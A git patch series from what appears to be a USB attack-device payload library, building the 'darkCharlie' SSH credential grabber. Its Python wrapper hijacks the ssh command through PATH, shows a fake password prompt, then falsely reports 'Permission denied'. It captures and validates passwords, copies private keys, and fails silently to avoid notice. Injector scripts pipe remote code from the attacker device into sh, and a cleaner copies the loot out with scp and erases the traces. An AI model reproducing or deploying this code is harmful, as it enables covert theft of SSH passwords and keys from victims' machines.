From 0f4129b124c21cee91eae2579d540021bad15e0d Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Tue, 19 Sep 2017 14:14:59 -0700 Subject: [PATCH 01/56] Python payload prototype Version has been tested to deal with some command line scenarios. Still want to test its ability to work with paramiko, including trying to get it to install if it hasn't already. --- .../library/credentials/darkCharlie/ssh.py | 412 ++++++++++++++++++ 1 file changed, 412 insertions(+) create mode 100644 payloads/library/credentials/darkCharlie/ssh.py diff --git a/payloads/library/credentials/darkCharlie/ssh.py b/payloads/library/credentials/darkCharlie/ssh.py new file mode 100644 index 00000000..7ea76f48 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/ssh.py @@ -0,0 +1,412 @@ +#! PYTHON_EXECUTABLE_GOES_HERE + +''' +Dark Charlie remote shell cred grabber + +Version 0.1 + +Using open-ended exceptions here to maintain silence when errors happen +''' + +originalSSHExecutable = "ORIGINAL_SSH_EXE_GOES_HERE" + +def cantLoadModuleError(): + import sys + if sys.version_info.major < 3: + return ImportError + if sys.version_info.minor < 6: + return ImportError + else: + return ModuleNotFoundError + +def getLootFileName(): + import os + thisFullPath = os.path.abspath(__file__) + thisDirectory = os.path.split(thisFullPath)[0] + lootFile = thisDirectory + os.sep + "ssh.conf" + return os.path.join(lootFile) + +def initializeThisScript(): + '''This function will be run the first time by the bunny''' + import subprocess + import re + pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE) + pythonExecutable = pathFinder.stdout.read().strip() + pathFinder = subprocess.Popen("which ssh".split(), stdout = subprocess.PIPE) + sshExecutable = pathFinder.stdout.read().strip() + try: + import paramiko + except cantLoadModuleError(): + try: + paramikoInstaller = subprocess.Popen("pip install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE) + paramikoInstaller = subprocess.Popen("pip3 install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE) + except: + pass + try: + import json + except cantLoadModuleError(): + try: + jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE) + jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE) + except: + pass + try: + import getpass + except: + try: + getPassInstaller = subprocess.Popen("pip install --user getpass", stdout = subprocess.PIPE, stderr = subprocess.PIPE) + except: + pass + thisFileName = __file__ + thisFile = open(thisFileName, 'r') + originalCode = thisFile.read() + thisFile.close() + newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1) + newCode = re.sub("ORIGINAL_SSH_EXE_GOES_HERE", sshExecutable, newCode, 1) + thisFile = open(thisFileName, 'w') + thisFile.write(newCode) + thisFile.close() + createLootFile(getLootFileName()) + quit() + +def createLootFile(lootFileName): + import json + initialData = {"configFiles":{}, "passwords":{}} + addDefaultSSHConfigFilesToLoot(initialData) + lootFile = open(lootFileName, 'w') + json.dump(initialData, lootFile) + lootFile.close() + +def addDefaultSSHConfigFilesToLoot(lootData): #using lootData as a reference here, no returns + mainConfigData, userConfigData = analyzeDefaultSSHConfigFiles() + mainConfigHash, mainData = mainConfigData + userConfigHash, userData = userConfigData + lootData["configFiles"][mainConfigHash] = mainData + lootData["configFiles"]["main"] = mainData + lootData["configFiles"][userConfigHash] = userData + lootData["configFiles"]["user"] = userData + +def analyzeDefaultSSHConfigFiles(): + import os + try: + mainConfigData = analyzeConfigFile("/etc/ssh/ssh_config") + if mainConfigData: + mainFileHash, mainData = mainConfigData + else: + mainFileHash = None + mainData = None + except: + mainFileHash = None + mainData = None + try: + userConfigFileName = os.getenv("HOME") + "/.ssh/config" + userConfigData = analyzeConfigFile(userConfigFileName) + if userConfigData: + userFileHash, userData = userConfigData + else: + userFileHash = None + userData = None + except: + userFileHash = None + userData = None + return ((mainFileHash, mainData), (userFileHash, userData)) + +def loadLootFile(lootFileName): + import json + try: + file = open(lootFileName, 'r') + data = json.load(file) + file.close() + return data + except: + return False + +def saveLootFile(loot, lootFileName): + import json + try: + file = open(lootFileName, 'w') + json.dump(loot, file) + file.close() + except: + pass + +class SSHArgHandler(object): + + def __init__(self, rawArgList): + self.password = None + self.optionsDict = self.getOptionsDict(rawArgList) + self.keyFileName = self.findArgument("-i", rawArgList) + if self.keyFileName: + self.keyFile = snarfKeyFile(self.keyFileName) + else: + self.keyFile = None + self.configFile = self.findArgument("-F", rawArgList) + if self.configFile: + configFileInfo = analyzeConfigFile(self.configFile) + else: + configFileInfo = None + if configFileInfo: + self.configFileHash, self.configFileDict = configFileInfo + else: + self.configFileHash = None + self.configFileDict = None + self.host = rawArgList[-1] + if "@" in self.host: + self.host = self.host.split("@")[-1] + self.port = self.findArgument("-p", rawArgList) + self.user = self.findUserName(rawArgList) + self.commandOptions = " ".join(rawArgList[1:]) + self.intendedCommand = originalSSHExecutable + " " + self.commandOptions + + def findUserName(self, args): + user = self.findArgument("-l", args) + if not user: + if "@" in args[-1]: + user = args[-1].split("@")[0] + if not user: + if "User" in self.optionsDict: + user = self.optionsDict["User"] + if not user: + if self.configFileDict and self.host in self.configFileDict: + if "User" in self.configFileDict[self.host]: + user = self.configFileDict[self.host]["User"] + if not user: + return "None" + return user + + def getOptionsDict(self, args): + interestingArgs = args[1:-1] + options = {} + for i in range(len(interestingArgs)): + rawOption = None + if interestingArgs[i].startswith("-o"): + if len(interestingArgs[i]) > 2: + rawOption = interestingArgs[i][2:] + elif i == len(interestingArgs) - 1: #somebody probably messed up the command + continue + else: + rawOption = interestingArgs[i + 1] + if rawOption: + optionList = rawOption.split("=") + if len(optionList) == 2: + key, value = optionList + options[key] = value + return options + + def findArgument(self, argOfInterest, args): #this assumes the argument of interest should only show up in the command once + interestingArgs = args[1:-1] + for i in range(len(interestingArgs)): + if interestingArgs[i].startswith(argOfInterest): + if len(interestingArgs[i]) > 2 and not argOfInterest.startswith("--"): + value = interestingArgs[i][2:] + elif i == len(interestingArgs) - 1: #ten bucks says this probably won't run + continue + else: + return interestingArgs[i + 1] + return None + + def saveData(self): + infoDict = {} + if self.password: + infoDict["password"] = self.password + if self.optionsDict: + infoDict["options"] = self.optionsDict + if self.keyFile: + infoDict["privateKey"] = self.keyFile + if self.host: + infoDict["host"] = self.host + if self.port: + infoDict["port"] = self.port + if self.user: + infoDict["user"] = self.user + return infoDict + +def analyzeConfigFile(configFileName): #The tat rolled a 20? + import os + import re + regexSplitter = re.compile("[\s\=]") + if not os.path.isfile(configFileName): + return False + file = open(configFileName, 'r') + data = file.read() + file.close() + fileHash = hash(data) + data = data.split("\n") + currentHostNickname = "None" + hostDict = {} + for line in data: + line = line.strip() + if not line: + continue + if line.startswith("#"): + continue + if line.startswith("Host") and line.split()[0] == "Host": + hostLine = re.split(regexSplitter, line) + if len(hostLine) > 1: + currentHostNickname = hostLine[1] + else: + currentHostNickname = "None" + if not currentHostNickname in hostDict: + hostDict[currentHostNickname] = {} + continue + lineSplit = re.split(regexSplitter, line) + if len(lineSplit) == 1: + hostDict[currentHostNickname][lineSplit[0]] = "None" + else: + key = lineSplit[0] + value = " ".join(lineSplit[1:]) + try: + if key == "IdentityFile": + keyRead = snarfKeyFile(value) + if not keyRead: + value += "(FILENOTFOUND)" + else: + value = keyRead + except: + value = "UnableToLoad" + hostDict[currentHostNickname][key] = value + return (fileHash, hostDict) + +def snarfKeyFile(keyFileName): + import os + import base64 + if not os.path.isfile(keyFileName): + return False + keyFile = open(keyFileName, 'rb') + key = keyFile.read() + keyFile.close() + return base64.b64encode(key).decode() + +def paramikoSaysWeNeedAPassword(host, port, user): + try: + import paramiko + except cantLoadModuleError(): + return True #default to true if we can't check it + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy) + try: + ssh.connect(host, port = int(port), username = user) + ssh.close() + return False + except paramiko.ssh_exception.SSHException: + try: + ssh.connect(host, port = int(port), username = user, password = "12345") #probably not their real password unless they're an idiot and this is their luggage + ssh.close() + return False + except paramiko.ssh_exception.AuthenticationException: + return True + except: + return False + +def paramikoApprovesOfThisPassword(host, port, user, password): + try: + import paramiko + except cantLoadModuleError(): + return True #default to true if we can't check it + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy) + try: + ssh.connect(host, port = int(port), username = user, password = password) #hopefully their real password + ssh.close() + return True + except paramiko.ssh_exception.AuthenticationException: + return False + +def parseArguments(): + import sys + argList = sys.argv + if "--initializeScript" in sys.argv: + initializeThisScript() + else: + return argList + +def findHostInLootConfigs(lootFileData, host): + for fileHash in lootFileData["configFiles"]: + if host in lootFileData["configFiles"][fileHash]: + return lootFileData["configFiles"][fileHash][host] + return None + +def getUserName(): + import getpass + return getpass.getuser() + +def lowDownDirtyDeceiver(user, hostAddress): + import getpass + prompt = "%s@%s's password: " %(user, hostAddress) + password = getpass.getpass(prompt) + print("Permission denied, please try again.") + return password + +def shinyLetsBeBadGuys(): + argList = parseArguments() + lootFileData = loadLootFile(getLootFileName()) + sshArgs = SSHArgHandler(argList) + if sshArgs.configFileHash: + lootFileData["configFiles"][sshArgs.configFileHash] = sshArgs.configFileDict + addDefaultSSHConfigFilesToLoot(lootFileData) + hostConfigFileData = findHostInLootConfigs(lootFileData, sshArgs.host) + hostAddress = sshArgs.host + userName = None + hostPort = None + password = None + if lootFileData["configFiles"]["main"]: + if "HostName" in lootFileData["configFiles"]["main"]: + hostAddress = lootFileData["configFiles"]["main"]["HostName"] + if "Port" in lootFileData["configFiles"]["main"]: + hostPort = lootFileData["configFiles"]["main"]["Port"] + if "IdentityFile" in lootFileData["configFiles"]["main"]: + password = "file(%s)" %lootFileData["configFiles"]["main"]["IdentityFile"] + if lootFileData["configFiles"]["user"]: + if "HostName" in lootFileData["configFiles"]["user"]: + hostAddress = lootFileData["configFiles"]["user"]["HostName"] + if "Port" in lootFileData["configFiles"]["user"]: + hostPort = lootFileData["configFiles"]["user"]["Port"] + if "IdentityFile" in lootFileData["configFiles"]["user"]: + password = "file(%s)" %lootFileData["configFiles"]["user"]["IdentityFile"] + if hostConfigFileData: + if "HostName" in hostConfigFileData: + hostAddress = hostConfigFileData["HostName"] + if "Port" in hostConfigFileData: + hostPort = hostConfigFileData["Port"] + if "IdentityFile" in hostConfigFileData: + password = "file(%s)" %hostConfigFileData["IdentityFile"] + if sshArgs.user: + userName = sshArgs.user + if sshArgs.port: + hostPort = sshArgs.port + if sshArgs.keyFile: + password = "file(%s)" %sshArgs.keyFile + if not userName: + try: + userName = getUserName() + except: + userName = "DefaultUserName" + if not hostPort: + hostPort = "22" + hostInfo = "%s@%s:%s" %(userName, hostAddress, hostPort) # user@hostAddress:port + if not password: + if not hostInfo in lootFileData["passwords"]: + gotValidPass = False + while not gotValidPass: + try: + password = lowDownDirtyDeceiver(userName, hostAddress) + except: + password = FailedToObtain + break + try: + gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password) + except: + break + lootFileData["passwords"][hostInfo] = [password, sshArgs.intendedCommand, sshArgs.saveData()] #json doesn't do tuples anyway + saveLootFile(lootFileData, getLootFileName()) + +if __name__ == '__main__': + import os + args = parseArguments() + intendedCommand = args[:] + intendedCommand[0] = originalSSHExecutable + intendedCommand = " ".join(intendedCommand) + if len(args) > 1: + shinyLetsBeBadGuys() + os.system(intendedCommand) + quit() \ No newline at end of file From 77b1a4e1230dc6fe9bb3ee110b900258aeb2d6c3 Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Tue, 19 Sep 2017 23:47:21 -0700 Subject: [PATCH 02/56] Now with injection and cleaning --- .../darkCharlie/cleaner/payload.txt | 66 ++++++++++++++++ .../{ssh.py => injector/darkCharlie.py} | 0 .../darkCharlie/injector/payload.txt | 79 +++++++++++++++++++ .../credentials/darkCharlie/injector/post.sh | 9 +++ .../credentials/darkCharlie/injector/pre.sh | 11 +++ 5 files changed, 165 insertions(+) create mode 100644 payloads/library/credentials/darkCharlie/cleaner/payload.txt rename payloads/library/credentials/darkCharlie/{ssh.py => injector/darkCharlie.py} (100%) create mode 100644 payloads/library/credentials/darkCharlie/injector/payload.txt create mode 100644 payloads/library/credentials/darkCharlie/injector/post.sh create mode 100644 payloads/library/credentials/darkCharlie/injector/pre.sh diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt new file mode 100644 index 00000000..db71f259 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt @@ -0,0 +1,66 @@ +#!/bin/bash + +# Title: darkCharlie{Cleaner} +# Author: Michael Weinstein +# Target: Mac/Linux +# Version: 0.1 +# +# Get the ssh creds from our loot collection. +# And clean up after +# +# White | Ready +# Blue blinking | Attacking +# Green | Finished + +LED SETUP + +#setup the attack on macos (if false, attack is for Linux) +mac=false + +if [ "$mac" = true ] +then + ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E +else + ATTACKMODE ECM_ETHERNET HID +fi + +DUCKY_LANG us + +GET SWITCH_POSITION +GET HOST_IP + +cd /root/udisk/payloads/$SWITCH_POSITION/ +LOOT=/root/udisk/loot/darkCharlie +mkdir -p $LOOT + +LED ATTACK + +if [ "$mac" = true ] +then + RUN OSX terminal +else + RUN UNITY xterm +fi +QUACK DELAY 2000 + +QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd #nice hiding of known host info +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 500 +QUACK STRING hak5bunny +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 500 +if [ "$mac" = true ] +then + QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile +else + QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc +fi +QUACK ENTER +QUACK DELAY 200 +QUACK STRING exit +QUACK DELAY 200 +QUACK ENTER +LED SUCCESS +#See you, space cowboy... \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/ssh.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py similarity index 100% rename from payloads/library/credentials/darkCharlie/ssh.py rename to payloads/library/credentials/darkCharlie/injector/darkCharlie.py diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt new file mode 100644 index 00000000..a59c6d07 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/injector/payload.txt @@ -0,0 +1,79 @@ +#!/bin/bash + +# Title: darkCharlie +# Author: Michael Weinstein +# Target: Mac/Linux +# Version: 0.1 +# +# Create a wrapper for ssh sessions that +# will live inside ~/.config/ssh and be added +# tn the $PATH. +# +# This payload was inspired greatly by SudoBackdoor +# and much of the code here was derived (or copied +# wholesale) from that with great thanks to oXis. +# +# White | Ready +# Amber blinking | Waiting for server +# Blue blinking | Attacking +# Green | Finished + +LED SETUP + +#setup the attack on macos (if false, attack is for Linux) +mac=false + +if [ "$mac" = true ] +then + ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E +else + ATTACKMODE ECM_ETHERNET HID +fi + +DUCKY_LANG us + +GET SWITCH_POSITION +GET HOST_IP + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening (credit audibleblink) +while ! nc -z localhost 80; do sleep 0.2; done +# that was brilliant! + +LED ATTACK + +if [ "$mac" = true ] +then + RUN OSX terminal +else + RUN UNITY xterm +fi +QUACK DELAY 2000 + +if [ "$mac" = true ] +then + QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh + QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh + QUACK STRING curl "http://$HOST_IP/post.sh" \| sh + QUACK STRING ~/.config/ssh/ssh --initializeScript +else + QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT + QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up + QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh + QUACK STRING ~/.config/ssh/ssh --initializeScript +fi + +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 200 +QUACK STRING exit +QUACK DELAY 200 +QUACK ENTER +LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20 diff --git a/payloads/library/credentials/darkCharlie/injector/post.sh b/payloads/library/credentials/darkCharlie/injector/post.sh new file mode 100644 index 00000000..bff63547 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/injector/post.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +chmod u+x ~/.config/sudo/sudo +if [ -f ~/.bash_profile ] +then + echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile +else + echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc +fi \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/injector/pre.sh b/payloads/library/credentials/darkCharlie/injector/pre.sh new file mode 100644 index 00000000..06431c18 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/injector/pre.sh @@ -0,0 +1,11 @@ +#!/bin/bash + +if [ ! -d ~/.config/ssh ] +then + mkdir -p ~/.config/ssh +fi + +if [ -f ~/.config/ssh/ssh ] +then + rm ~/.config/ssh/ssh +fi \ No newline at end of file From 99e6b63f4215a55c56db175df287874382805bb5 Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Thu, 21 Sep 2017 01:34:02 -0700 Subject: [PATCH 03/56] Testing bug fixes Windows line endings removed. Grrrr. WTF, microsoft? Found and fixed bug caused by missing default ssh config files making the program index into a NoneType by checking to make sure there's data there before indexing in. Added the blanket try/except block for silent failures. Main cause of these appears to be very badly written (invalid) ssh commands. This is probably the best behavior the program could have with these... just silently run them and let them fail normally. Do not pass go, do not collect 200 passwords. --- .../darkCharlie/injector/darkCharlie.py | 19 +++++++++------- .../darkCharlie/injector/payload.txt | 22 ++++++++++++++++--- .../credentials/darkCharlie/injector/post.sh | 5 +++-- .../credentials/darkCharlie/injector/pre.sh | 2 +- 4 files changed, 34 insertions(+), 14 deletions(-) diff --git a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py index 7ea76f48..225b5dcc 100644 --- a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py +++ b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py @@ -322,7 +322,7 @@ def parseArguments(): def findHostInLootConfigs(lootFileData, host): for fileHash in lootFileData["configFiles"]: - if host in lootFileData["configFiles"][fileHash]: + if lootFileData["configFiles"][fileHash] and host in lootFileData["configFiles"][fileHash]: #have to check if there is even file data there, otherwise we end up indexing into nothing and failing hard return lootFileData["configFiles"][fileHash][host] return None @@ -391,7 +391,7 @@ def shinyLetsBeBadGuys(): try: password = lowDownDirtyDeceiver(userName, hostAddress) except: - password = FailedToObtain + password = "FailedToObtain" break try: gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password) @@ -402,11 +402,14 @@ def shinyLetsBeBadGuys(): if __name__ == '__main__': import os - args = parseArguments() - intendedCommand = args[:] - intendedCommand[0] = originalSSHExecutable - intendedCommand = " ".join(intendedCommand) - if len(args) > 1: - shinyLetsBeBadGuys() + try: + args = parseArguments() + intendedCommand = args[:] + intendedCommand[0] = originalSSHExecutable + intendedCommand = " ".join(intendedCommand) + if len(args) > 1: + shinyLetsBeBadGuys() + except: #I really feel weird doing a massive open-ended exception here... but silence + pass os.system(intendedCommand) quit() \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt index a59c6d07..3da8b92b 100644 --- a/payloads/library/credentials/darkCharlie/injector/payload.txt +++ b/payloads/library/credentials/darkCharlie/injector/payload.txt @@ -60,20 +60,36 @@ QUACK DELAY 2000 if [ "$mac" = true ] then QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh + QUACK ENTER + QUACK DELAY 200 QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh + QUACK ENTER + QUACK DELAY 200 QUACK STRING curl "http://$HOST_IP/post.sh" \| sh + QUACK ENTER + QUACK DELAY 200 QUACK STRING ~/.config/ssh/ssh --initializeScript + QUACK ENTER + QUACK DELAY 200 else QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT - QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up + QUACK ENTER + QUACK DELAY 200 + QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" #Will test this on a mac when I finish up + QUACK ENTER + QUACK DELAY 200 QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh - QUACK STRING ~/.config/ssh/ssh --initializeScript + QUACK ENTER + QUACK DELAY 200 + QUACK STRING python "~/.config/ssh/ssh" --initializeScript + QUACK ENTER + QUACK DELAY 200 fi QUACK DELAY 200 QUACK ENTER QUACK DELAY 200 -QUACK STRING exit +#QUACK STRING exit QUACK DELAY 200 QUACK ENTER LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20 diff --git a/payloads/library/credentials/darkCharlie/injector/post.sh b/payloads/library/credentials/darkCharlie/injector/post.sh index bff63547..ab7f2980 100644 --- a/payloads/library/credentials/darkCharlie/injector/post.sh +++ b/payloads/library/credentials/darkCharlie/injector/post.sh @@ -1,9 +1,10 @@ #!/bin/bash -chmod u+x ~/.config/sudo/sudo +chmod u+x ~/.config/ssh/ssh if [ -f ~/.bash_profile ] then echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile else echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc -fi \ No newline at end of file +fi + diff --git a/payloads/library/credentials/darkCharlie/injector/pre.sh b/payloads/library/credentials/darkCharlie/injector/pre.sh index 06431c18..27e9a96e 100644 --- a/payloads/library/credentials/darkCharlie/injector/pre.sh +++ b/payloads/library/credentials/darkCharlie/injector/pre.sh @@ -8,4 +8,4 @@ fi if [ -f ~/.config/ssh/ssh ] then rm ~/.config/ssh/ssh -fi \ No newline at end of file +fi From 06d36975d170909107775b1e7acd77bbf9208cc1 Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Thu, 21 Sep 2017 10:22:24 -0700 Subject: [PATCH 04/56] Try/except harder Moved the try in the main try/except block so we will always get the original intended command to run. --- .../credentials/darkCharlie/injector/darkCharlie.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py index 225b5dcc..bb9b1c53 100644 --- a/payloads/library/credentials/darkCharlie/injector/darkCharlie.py +++ b/payloads/library/credentials/darkCharlie/injector/darkCharlie.py @@ -402,11 +402,11 @@ def shinyLetsBeBadGuys(): if __name__ == '__main__': import os + args = parseArguments() + intendedCommand = args[:] + intendedCommand[0] = originalSSHExecutable + intendedCommand = " ".join(intendedCommand) try: - args = parseArguments() - intendedCommand = args[:] - intendedCommand[0] = originalSSHExecutable - intendedCommand = " ".join(intendedCommand) if len(args) > 1: shinyLetsBeBadGuys() except: #I really feel weird doing a massive open-ended exception here... but silence From c30c99e66821cca5bce06a6cbb07b5058febe1db Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Thu, 21 Sep 2017 15:56:41 -0700 Subject: [PATCH 05/56] Version 0.1 working Added readme and polished up the payloads. Seems to be working now. --- .../darkCharlie/cleaner/payload.txt | 2 +- .../darkCharlie/injector/payload.txt | 10 +++--- .../library/credentials/darkCharlie/readme.md | 36 +++++++++++++++++++ 3 files changed, 42 insertions(+), 6 deletions(-) create mode 100644 payloads/library/credentials/darkCharlie/readme.md diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt index db71f259..f78eca67 100644 --- a/payloads/library/credentials/darkCharlie/cleaner/payload.txt +++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt @@ -43,7 +43,7 @@ else fi QUACK DELAY 2000 -QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd #nice hiding of known host info +QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json #nice hiding of known host info QUACK DELAY 200 QUACK ENTER QUACK DELAY 500 diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt index 3da8b92b..ec03ae26 100644 --- a/payloads/library/credentials/darkCharlie/injector/payload.txt +++ b/payloads/library/credentials/darkCharlie/injector/payload.txt @@ -73,23 +73,23 @@ then QUACK DELAY 200 else QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT - QUACK ENTER QUACK DELAY 200 + QUACK ENTER QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" #Will test this on a mac when I finish up - QUACK ENTER QUACK DELAY 200 + QUACK ENTER QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh - QUACK ENTER QUACK DELAY 200 + QUACK ENTER QUACK STRING python "~/.config/ssh/ssh" --initializeScript - QUACK ENTER QUACK DELAY 200 + QUACK ENTER fi QUACK DELAY 200 QUACK ENTER QUACK DELAY 200 -#QUACK STRING exit +QUACK STRING exit QUACK DELAY 200 QUACK ENTER LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20 diff --git a/payloads/library/credentials/darkCharlie/readme.md b/payloads/library/credentials/darkCharlie/readme.md new file mode 100644 index 00000000..eb9fa379 --- /dev/null +++ b/payloads/library/credentials/darkCharlie/readme.md @@ -0,0 +1,36 @@ +# darkCharlie SSH credential grabber + +* Author: Michael Weinstein +* Version: 0.1 +* Target: Mac/Linux + +Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference. + +Current dev status: I have tested this with both private key and password auth on a linux machine and found it working. I have not extensively tested with config files, but the limited testing I have done suggests that it is working as intended. I have not tested yet on a mac, but will probably do so very soon. I still need to do some more polishing on this, and especially want to get the use of paramiko better where it can check if the login needs a password and then check if the password entered into the wrapper is valid. + +## Description + +Injector: Creates a folder called ~/.config/ssh where it puts a python wrapper for ssh. Next, it copies over the python SSH wrapper. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for SSH and the path for python. The initialization function also initializes a file for saving SSH creds and configuration details in JSON format. It will save the global and user SSH config file details immediately, including grabbing any private keys linked in the config file (if you know these will be of interest, you can exfiltrate them immediately). Finally, ~/.config/ssh is added as the first element on the user's PATH so that they will be running this wrapper instead of actually SSHing in. The main abnormality a user will see is if they need to manually enter a password, they'll get it "wrong" the first time and have to reenter it. This wrapper will load previous loot to see if a server's password has already been gotten and won't try to get it again to avoid raising suspicions. +Cleaner: Gets back the file containing JSON-encoded SSH configuration and credential data. After exfiltration of the data, it will delete the directory and files it created and clean up its change to the bashrc or bash_profile. + +## Configuration + +Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode. + +## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.) +Injector + +| LED | Status | +| ---------------- | -------------------- | +| White | Ready | +| Amber blinking | Waiting for server | +| Blue blinking | Attacking | +| Green | Finished | + +Cleaner + +| LED | Status | +| ---------------- | -------------------- | +| White | Ready | +| Blue blinking | Attacking | +| Green | Finished | From 31468c0e63d8a313710e92efbc273cd23c5a017a Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Sun, 24 Sep 2017 02:11:45 -0700 Subject: [PATCH 06/56] mac attack Got mac attacks working now. SEDing in place on a mac seems like something that really makes the terminal unhappy. Did the same thing with a python one-shot command. --- .../credentials/darkCharlie/cleaner/payload.txt | 16 ++++++++++++---- .../credentials/darkCharlie/injector/payload.txt | 16 +++++++++++----- 2 files changed, 23 insertions(+), 9 deletions(-) diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt index f78eca67..11dfa7c0 100644 --- a/payloads/library/credentials/darkCharlie/cleaner/payload.txt +++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt @@ -53,14 +53,22 @@ QUACK ENTER QUACK DELAY 500 if [ "$mac" = true ] then - QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile + QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile #macs really seem to hate it when you sed in place, I think. + QUACK ENTER + QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\"" else QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc fi QUACK ENTER QUACK DELAY 200 -QUACK STRING exit -QUACK DELAY 200 -QUACK ENTER +if [ "$mac" = true ] +then + QUACK DELAY 2000 + QUACK GUI w +else + QUACK STRING exit + QUACK DELAY 